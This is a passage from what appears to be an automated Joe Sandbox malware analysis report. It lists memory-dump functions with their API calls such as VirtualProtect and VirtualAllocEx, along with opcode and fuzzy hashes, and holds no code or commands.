                                                                  • Instruction Fuzzy Hash: B42137B1C003499FEB10DFAAC884BEEFBF5AF48320F54842AD459A7240D7789545CFA1
                                                                  Function 06B40301 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 06B4037C
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69724869209.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6b40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: 386dcc42ad709cf08a8804f088a9f0185fbcd78bf9c7b7a9e4fe57466e6ad437
                                                                  • Instruction ID: 56eae0102090abd78b338f4de512032adba90e82d2294a9f5cec8bb25ebfcd3f
                                                                  • Opcode Fuzzy Hash: 386dcc42ad709cf08a8804f088a9f0185fbcd78bf9c7b7a9e4fe57466e6ad437
                                                                  • Instruction Fuzzy Hash: 152102B1D007499FDB10DFAAC884BEEFBF4EF88320F54842AD559A7200C7799945CBA0
                                                                  Function 06D7D788 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06D7D7FC
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726094094.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6d70000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: 1150efacbe9d584e5d6aad7fab4e376f2e882354846ab2f328df35a1ea083d3d
                                                                  • Instruction ID: 145cd09f0b0a1904dfe5d1d69f32eab02ce2ba2e3f57008583dc2671dbb566e4
                                                                  • Opcode Fuzzy Hash: 1150efacbe9d584e5d6aad7fab4e376f2e882354846ab2f328df35a1ea083d3d
                                                                  • Instruction Fuzzy Hash: 932113B1C003498FDB10DFAAC884BEEFBF5AF88320F54842AD519A7240D7789945CFA1
                                                                  Function 06B40308 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 06B4037C
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69724869209.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6b40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: b3310f1060af3e1328e641a3f20dea74230ad347674fc95d962cf4ef95d20dfa
                                                                  • Instruction ID: fd4a3cd31fb8dc271c9d4bc97e1c2a622fa27cd23febd817c0b226919c185124
                                                                  • Opcode Fuzzy Hash: b3310f1060af3e1328e641a3f20dea74230ad347674fc95d962cf4ef95d20dfa
                                                                  • Instruction Fuzzy Hash: 5511F4B1D007499FDB10DFAAC884BAEFBF4EF88320F54842AD519A7240C7789945CFA1
                                                                  Function 06D62B90 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D62BFE
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726029763.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6d60000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: da676cd8db34dbf819e369cff6a0d1ab5167a3b17e4d0adb3ba462bc09e30c08
                                                                  • Instruction ID: 6d6737efa95d6e971c2962d8c916dc7f26f1fde57b7b5c03a590e20961196a42
                                                                  • Opcode Fuzzy Hash: da676cd8db34dbf819e369cff6a0d1ab5167a3b17e4d0adb3ba462bc09e30c08
                                                                  • Instruction Fuzzy Hash: 78113772900349DFDB10DFAAD844BDFBBF5AF88324F14881AE51AA7240C7759554CFA0
                                                                  Function 06D62B8B Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D62BFE
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726029763.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6d60000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: bc9af7d46b06f173e4e1dcb4f3109b5b7ee9e2f8412909cd288d1819e9938391
                                                                  • Instruction ID: c266d65edf8216e3da2b79b454f0a5813b21d47a3d9f7cae41693169c9b1bacb
                                                                  • Opcode Fuzzy Hash: bc9af7d46b06f173e4e1dcb4f3109b5b7ee9e2f8412909cd288d1819e9938391
                                                                  • Instruction Fuzzy Hash: 5F115676800309CFDB10DFAAC8457EEBBF5AF48314F14881AE51AA7240C7399654CBA0
                                                                  Function 05DB96C4 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: %
                                                                  • API String ID: 0-2567322570
                                                                  • Opcode ID: b7b3f68718b417f728a1f85be227912ac032d404b72587fe3e57cd7b67693828
                                                                  • Instruction ID: 4d4916ac4b85c942c4dc1495071b5ae4a3ce7f2ca72a9a6c0f8907c84363aee1
                                                                  • Opcode Fuzzy Hash: b7b3f68718b417f728a1f85be227912ac032d404b72587fe3e57cd7b67693828
                                                                  • Instruction Fuzzy Hash: 3141A0B4904268CBEBA4DF68C885BE9BBB2FB49304F50809AD54EA7340DB755EC58F50
                                                                  Function 05DB9DB2 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ?
                                                                  • API String ID: 0-1684325040
                                                                  • Opcode ID: 2bf98a6ce552c28c8d90f02a732a1d2aa09eedb27de1e95617783a580618e077
                                                                  • Instruction ID: 1699fd3925ea751921ec28cca883d9673665aac962d48561ec10a3dbf9752292
                                                                  • Opcode Fuzzy Hash: 2bf98a6ce552c28c8d90f02a732a1d2aa09eedb27de1e95617783a580618e077
                                                                  • Instruction Fuzzy Hash: 5541B0B4905268CFEBA0DF64C884BE9BBB2EB49304F5080DAD54EA7240DB759EC5CF50
                                                                  Function 05DB9FF2 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: /
                                                                  • API String ID: 0-2043925204
                                                                  • Opcode ID: 0b896f32aa41025805a8e1c58c7d18504aaf684e586d480184f2612ee7171483
                                                                  • Instruction ID: eb6ff5525372eee6d0943ee335e9a56791b3bdb7b665b183a40752a0c86cbbe5
                                                                  • Opcode Fuzzy Hash: 0b896f32aa41025805a8e1c58c7d18504aaf684e586d480184f2612ee7171483
                                                                  • Instruction Fuzzy Hash: 2541AF70905299CFEBA4DF54C894BE9B7B2BB49304F5080EAD10EA7250CB759EC5CF14
                                                                  Function 05DB9F7E Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0
                                                                  • API String ID: 0-4108050209
                                                                  • Opcode ID: 13b955d24a3759935a322314454079fab4fc1ef32f05daf6386fb65ba4d5465e
                                                                  • Instruction ID: 57b6873be296fbd36f40a60e4f9ec4e73e4e7ba5edcb44c3fe8bc1c4d284d8b4
                                                                  • Opcode Fuzzy Hash: 13b955d24a3759935a322314454079fab4fc1ef32f05daf6386fb65ba4d5465e
                                                                  • Instruction Fuzzy Hash: 5A31B1B0905259CFEBA0DF24C894BE9B7B2AB49304F5080EAD10EA7240DB759EC58F10
                                                                  Function 06B412E8 Relevance: 1.3, APIs: 1, Instructions: 57memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(?,?,?,?), ref: 06B4135B
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69724869209.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6b40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: d93c11eb8d19be72e82b7fe8f84450630fae2675fec20401f7adfbacdf83d1a1
                                                                  • Instruction ID: 1e756d614c347fe29c6c6677054d038bfabdededcee05ff5313e4f9dc53c0722
                                                                  • Opcode Fuzzy Hash: d93c11eb8d19be72e82b7fe8f84450630fae2675fec20401f7adfbacdf83d1a1
                                                                  • Instruction Fuzzy Hash: 9F114772800349DFDB10DFAAC8447EEBBF5AF88314F24841AD569A7240C735A585CBA0
                                                                  Function 06B412F0 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(?,?,?,?), ref: 06B4135B
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69724869209.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6b40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: ee87c8651d729f4cb8fed75d5b349a67fda64b2ddd7cbe7bb4f42ecf12388954
                                                                  • Instruction ID: 7d56486bd543a2e4b2400f5ebcbf29dd30b345b614bdcfbc520919b276cc0c68
                                                                  • Opcode Fuzzy Hash: ee87c8651d729f4cb8fed75d5b349a67fda64b2ddd7cbe7bb4f42ecf12388954
                                                                  • Instruction Fuzzy Hash: 4F113776D00349DFDB10DFAAC844BEEFBF5AF88320F14881AD529A7240C775A544CBA0
                                                                  Function 07033BF9 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726771993.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7030000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: "
                                                                  • API String ID: 0-123907689
                                                                  • Opcode ID: 434d5c91158b62056900c1026d01471360331871753ca879d287a35d2acc7d34
                                                                  • Instruction ID: a9cdc81c6b7c088d3fcc27358a2e9135855b9e2b23583b86a8662e83fc20bcbb
                                                                  • Opcode Fuzzy Hash: 434d5c91158b62056900c1026d01471360331871753ca879d287a35d2acc7d34
                                                                  • Instruction Fuzzy Hash: 5211E5B8A802298FDB64DF28C884ADDB7F6FB4E314F4040D9D54DA7348CA349E848F45
                                                                  Function 05DB9959 Relevance: 1.3, Strings: 1, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .
                                                                  • API String ID: 0-248832578
                                                                  • Opcode ID: 766b9698cfbaad6478b5e294165b3af6ccf57203598471ad27ace5347a318266
                                                                  • Instruction ID: fcab305254122b0931de0912284c1fa799196d8eb113bf69894436e22be5e347
                                                                  • Opcode Fuzzy Hash: 766b9698cfbaad6478b5e294165b3af6ccf57203598471ad27ace5347a318266
                                                                  • Instruction Fuzzy Hash: 4601C274A002188FCB55DF24C998BD9BBB5FB48304F50419AE90DAB345DB355E82CF40
                                                                  Function 01344F16 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 9
                                                                  • API String ID: 0-2366072709
                                                                  • Opcode ID: 65ed6b689ec77b19aaa7670dacbe949f9141f007ceb6cf01bded80a6337ed490
                                                                  • Instruction ID: c99fee35c7ad44612571345dcd4a72dd9b1917f3684333417ce048080d661f41
                                                                  • Opcode Fuzzy Hash: 65ed6b689ec77b19aaa7670dacbe949f9141f007ceb6cf01bded80a6337ed490
                                                                  • Instruction Fuzzy Hash: 72019874900268CFDB61CF24D948BDCBAB5BB48300F2045EAD909A2284DB395A81CF00
                                                                  Function 06C42604 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: l
                                                                  • API String ID: 0-2517025534
                                                                  • Opcode ID: f219a2cf1d2882c9cd5595fd8c29751888e03db39a8941e493abfbeff71da080
                                                                  • Instruction ID: c0cb2143518f3a570971c3956fae858300448d843c5469c6c6787ac86c715c95
                                                                  • Opcode Fuzzy Hash: f219a2cf1d2882c9cd5595fd8c29751888e03db39a8941e493abfbeff71da080
                                                                  • Instruction Fuzzy Hash: 5801B2B0DA022CCFEBA6EF54D884B9CB6B9BB48304F40519AE509A2281C7B45B84CF41
                                                                  Function 05DB91CA Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: +
                                                                  • API String ID: 0-2126386893
                                                                  • Opcode ID: 39aa5b658d10524b74d77eca6c8207bee059f030c3c23c7efb9292e9b565bbe9
                                                                  • Instruction ID: 2ac604baf6f1b150e2826102a0e8d3508ef71294953d53a8c44f2dd218fe2de8
                                                                  • Opcode Fuzzy Hash: 39aa5b658d10524b74d77eca6c8207bee059f030c3c23c7efb9292e9b565bbe9
                                                                  • Instruction Fuzzy Hash: 62F0D474A00228CFCB14DF20C948ADDBBB1EF89344F248199D84967351CB759E86CF00
                                                                  Function 06C4A550 Relevance: 1.3, Strings: 1, Instructions: 15COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 9
                                                                  • API String ID: 0-2366072709
                                                                  • Opcode ID: b2ba273c306b375c192cff456fdad3d3dadc5a54ae828141fe017832049cb9d0
                                                                  • Instruction ID: b783ab45a8ffface0fe4ffca57faf55944245cf018c7bd5a51289049ed044a76
                                                                  • Opcode Fuzzy Hash: b2ba273c306b375c192cff456fdad3d3dadc5a54ae828141fe017832049cb9d0
                                                                  • Instruction Fuzzy Hash: A5E0173494931DCFE7A2DF61D8A4BE97BB9EB41610F1010C6D44997159CA781F86CF11
                                                                  Function 06C4A52D Relevance: 1.3, Strings: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 9
                                                                  • API String ID: 0-2366072709
                                                                  • Opcode ID: c8c3295d27277540569a9c8f3118e116d6f5c6a9cee71b2bb57e13d2f334b31c
                                                                  • Instruction ID: b0950c88ee9c41f915827e6bd38306f1422a53c5a7ada930ab8668fdf30f8422
                                                                  • Opcode Fuzzy Hash: c8c3295d27277540569a9c8f3118e116d6f5c6a9cee71b2bb57e13d2f334b31c
                                                                  • Instruction Fuzzy Hash: 22D0923491531DCFEBA1DF26D8A4B9977B9EB01601F1050D9D00963258CB741FC5CF41
                                                                  Function 06B61EA8 Relevance: .6, Instructions: 577COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69724967697.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6b60000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9dbf42f7d9c13615d9e4f22b9c876cefe0831049793af77c26d7031ee14fddfb
                                                                  • Instruction ID: d1bca832cd0f91bd44b6a9080253663a9e80f0dff0ea4e33ae7d8d1806ad8d30
                                                                  • Opcode Fuzzy Hash: 9dbf42f7d9c13615d9e4f22b9c876cefe0831049793af77c26d7031ee14fddfb
                                                                  • Instruction Fuzzy Hash: 1942DAB4E14209CFEF54DF9AC5946ADBBB2FF49301F1090A5EA1267394C7385A42CFA1
                                                                  Function 06B629D0 Relevance: .4, Instructions: 362COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69724967697.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6b60000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dbc4bcb57da8e4db4966c1ad66b8c5a63a4048a7911fee58a9f149b0efe67e47
                                                                  • Instruction ID: 7294f70be5f4e704702362791d2a57926bce5bebf5d6bb76cf4abeb043612735
                                                                  • Opcode Fuzzy Hash: dbc4bcb57da8e4db4966c1ad66b8c5a63a4048a7911fee58a9f149b0efe67e47
                                                                  • Instruction Fuzzy Hash: B8F107B4D01208DFEBA9DFA5E5946ECBBB2FF49311F205069E506AB350CB385A81CF50
                                                                  Function 06C43298 Relevance: .3, Instructions: 251COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5b445777e6369e2309230cf0f566ebbe98746b235a3a41eb27fc6211e6044100
                                                                  • Instruction ID: dde44e8806bd6b3663c4f4b8ccf8f59a3a17521886525c38e8ca2d7a033d55dc
                                                                  • Opcode Fuzzy Hash: 5b445777e6369e2309230cf0f566ebbe98746b235a3a41eb27fc6211e6044100
                                                                  • Instruction Fuzzy Hash: A0B12AB0E05259DFDB94EFAAD4486EDBBB1FF89304F508019E429AB354CB349945CF90
                                                                  Function 013442B3 Relevance: .2, Instructions: 240COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d4de005d805a0b5e5927482aafaf2cd68ddea1c68de3616943053a81123789b5
                                                                  • Instruction ID: 8f5aae2ef89684808ca9779da0b41220568797c07c15eb38e7990746933431bf
                                                                  • Opcode Fuzzy Hash: d4de005d805a0b5e5927482aafaf2cd68ddea1c68de3616943053a81123789b5
                                                                  • Instruction Fuzzy Hash: CCC19274D06269CFEB64DF24C948B9DBBF1BB48305F1481EAD489A3645DB746AC1CF80
                                                                  Function 01345775 Relevance: .2, Instructions: 221COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0332fdcff3916a6124329ab6cf6da1ff58127ba6a6e59f59e5e49ee057fd2889
                                                                  • Instruction ID: ccd74764aa69c110eaa774da36c4f096fcea40cc5c05eea88ab6e5de48c70fa0
                                                                  • Opcode Fuzzy Hash: 0332fdcff3916a6124329ab6cf6da1ff58127ba6a6e59f59e5e49ee057fd2889
                                                                  • Instruction Fuzzy Hash: 52B1E2B4E44229CFDB70CF24D948BA9BBB5BB49314F1040EAD64AA7685DB742EC4CF14
                                                                  Function 06C43288 Relevance: .2, Instructions: 219COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8c7031b692842468a7bd56009f7c13d4d430537b8fd68e43b3f44a82561729c3
                                                                  • Instruction ID: 9519a503e00c830d18f16b1a6119d4b497301ba3321e3aed348cbc81c8c23c8b
                                                                  • Opcode Fuzzy Hash: 8c7031b692842468a7bd56009f7c13d4d430537b8fd68e43b3f44a82561729c3
                                                                  • Instruction Fuzzy Hash: 629129B0E04299CFDB95EFAAD4486EDBBB5FF89304F108029E429AB354CB345945CF91
                                                                  Function 06B63968 Relevance: .2, Instructions: 208COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69724967697.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6b60000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6e2ea1d22b66d8136a8de15b18315dc99596ca5fb46b8e68f2c5ff89ce6f5f63
                                                                  • Instruction ID: 6849b92a07b7624975314e3c235e5e3a056f6340e3608f1b11abc64d97e0323c
                                                                  • Opcode Fuzzy Hash: 6e2ea1d22b66d8136a8de15b18315dc99596ca5fb46b8e68f2c5ff89ce6f5f63
                                                                  • Instruction Fuzzy Hash: 0591C0B4D01208CFCB98DFAAD5986ECBBF2EF49315F14A0A9E416B7251DB395841CF60
                                                                  Function 06C45AB0 Relevance: .2, Instructions: 194COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8a1965777026e65cab4b75dcbcc236625c6b52a71a3d95239dac18f15d10a9ee
                                                                  • Instruction ID: dc6dc0f9b0908bd9baf39da17a6f37342ab465e8971b3741c70a67ab198a73e2
                                                                  • Opcode Fuzzy Hash: 8a1965777026e65cab4b75dcbcc236625c6b52a71a3d95239dac18f15d10a9ee
                                                                  • Instruction Fuzzy Hash: A68126B4D05218CFDB94EFA6D5846EDBBB1FF49300F908129D406AB254D7745A82CFA1
                                                                  Function 01340870 Relevance: .2, Instructions: 180COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 79c3329021aa172d9515a72c251d81f57a9a1ca85b8a59745ef37b3334223a1e
                                                                  • Instruction ID: b0b90ecb02b4664b6589cb9524840a3b5a93be960c9e63d3e66322b3834777de
                                                                  • Opcode Fuzzy Hash: 79c3329021aa172d9515a72c251d81f57a9a1ca85b8a59745ef37b3334223a1e
                                                                  • Instruction Fuzzy Hash: 56510730704248DFE3189B78D554AAA7FF9EF86318F1184A5E286CB661DB35FC06CB91
                                                                  Function 05DB7618 Relevance: .2, Instructions: 162COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c38108a482f2bab2cc4aeb31e683cbac1d848826e7feb935442e66732122a78a
                                                                  • Instruction ID: ba3a5022d7d229f6b042354b299e36b8db9d52ec1495036b3460cf64d9f99a28
                                                                  • Opcode Fuzzy Hash: c38108a482f2bab2cc4aeb31e683cbac1d848826e7feb935442e66732122a78a
                                                                  • Instruction Fuzzy Hash: 1E71E174E06208CFEB90DF69D884BEDBBB6FB89300F5080AAD44AA7255DB745D85CF41
                                                                  Function 06C45AA2 Relevance: .2, Instructions: 157COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 80348858e806a91219bd405af9d0f41e226f668785854ecb526d9808089c1dd2
                                                                  • Instruction ID: 636883d8abb55ef80757fc267f3cf99d6d531d49cec073fe3d9c625b578eeac7
                                                                  • Opcode Fuzzy Hash: 80348858e806a91219bd405af9d0f41e226f668785854ecb526d9808089c1dd2
